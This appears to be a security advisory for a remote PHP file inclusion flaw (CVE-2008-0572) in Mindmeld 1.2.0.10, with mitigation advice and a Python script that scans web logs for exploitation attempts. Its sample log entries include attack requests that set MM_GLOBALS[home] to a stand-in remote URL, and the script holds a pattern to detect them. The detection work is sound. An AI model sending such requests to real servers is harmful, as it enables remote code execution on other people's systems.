Mindmeld · Mindmeld · CVE-2008-0572
**Name of the Vulnerable Software and Affected Versions**
Mindmeld version 1.2.0.10
**Description**
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `MM_GLOBALS[home]` parameter to several PHP files, including (1) `acweb/admin_index.php`, and (2) `ask.inc.php`, (3) `learn.inc.php`, (4) `manage.inc.php`, (5) `mind.inc.php`, and (6) `sensory.inc.php` in the `include/` directory.
**Recommendations**
For Mindmeld version 1.2.0.10, consider restricting access to the vulnerable PHP files until a patch is available. As a temporary workaround, avoid using the `MM_GLOBALS[home]` parameter in the affected API endpoints. Restrict access to the `include/` directory to minimize the risk of exploitation.
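
To check whether the affected scripts have already been requested in the way the description states, the web server's access log can be searched for requests that carry a URL in `MM_GLOBALS[home]`. The script below is an added example, not part of the original advisory or of Mindmeld; the function name, the combined log format, the `/mindmeld` install prefix and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts named in the advisory, matched as path suffixes because the
# install prefix ("/mindmeld" below) is an assumption and varies per site.
AFFECTED_SUFFIXES = (
    "/acweb/admin_index.php",
    "/include/ask.inc.php",
    "/include/learn.inc.php",
    "/include/manage.inc.php",
    "/include/mind.inc.php",
    "/include/sensory.inc.php",
)
PARAM = "MM_GLOBALS[home]"
# Client address, request target and status from a common/combined log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A value beginning with scheme:// is a URL rather than a local path.
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def find_suspect_requests(log_lines):
    """Return (line_no, client, path, status, value) per suspicious request."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        path = unquote(parts.path)
        if not path.lower().endswith(AFFECTED_SUFFIXES):
            continue
        # parse_qsl decodes %5B/%5D; the extra unquote covers double encoding.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == PARAM and REMOTE_RE.match(unquote(value).strip()):
                hits.append((line_no, client, path, status, unquote(value)))
    return hits


# Constructed sample entries (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2008:10:00:01 +0000] "GET /mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://files.example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Feb/2008:10:00:05 +0000] "GET /mindmeld/acweb/admin_index.php?MM_GLOBALS%5Bhome%5D=http%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.1" 200 498',
    '198.51.100.4 - - [01/Feb/2008:10:02:11 +0000] "GET /mindmeld/include/learn.inc.php?MM_GLOBALS[home]=/var/www/mindmeld/ HTTP/1.1" 200 1024',
    '198.51.100.4 - - [01/Feb/2008:10:02:15 +0000] "GET /mindmeld/index.php?page=ask HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(*find_suspect_requests(SAMPLE_LOG), sep="\n")
```

Access logs record only the query string, so a clean result does not replace the access restrictions recommended above.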